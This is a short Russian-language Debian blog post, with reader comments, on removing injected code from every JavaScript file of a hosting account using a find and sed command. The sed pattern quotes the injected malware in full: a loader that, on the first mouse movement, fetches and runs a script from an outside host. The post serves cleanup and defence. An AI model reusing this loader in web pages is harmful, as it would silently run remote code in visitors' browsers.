Debian.pro

Блог для пользователей и администраторов Debian


Зараженный js на хостинге

Вот столкнулся с такой штукой что во всех js файлах одного аккаунта были прописаны левые ссылки.

Лечим таким образом в командной строке делаем :

find 55 -name «*.js» |xargs sed -i «s|document.write(‘<scr’+'ipt src=\»https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\»></scr’+'ipt>’);var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript(‘http://firefoxstabs.com/’ + Math.random().toString().substring(3) + ‘.js’, function() {flag = 2;});}});});| |g»

ТОЛЬКО УКАЖИТЕ find -у нужный каталог


Комментарии (3):

  1. Алексей :

    У Вас тут SPAM в первом комментарии.

  2. Не могли бы Вы препарировать это ком. строку — что есть что в ней? У меня на хостинге несколько сайтов и на тоже них периодически появляются зараженные редиректами php и js файлы. Вредоносный код иногда бывает довольно объемным и содержащим всевозможные спецсимволы. Очень интересует вопрос как вычищать его с помощью поиска и замены. Спасибо.

  3. yukra :

    find 55 -name «*.js» — ищем все файлы с именем *.js в каталоге 55
    xargs sed -i «s|ВредоносныйКодКоторыйНужноЗаменить| |g» — передаем найденые имена файлов sed’у, который в свою очередь заменяет строку «ВредоносныйКодКоторыйНужноЗаменить» на пробел. Обрати внимание на кавычки, WP обычно их портит.
    Зы примет некрофилам :)

Написать комментарий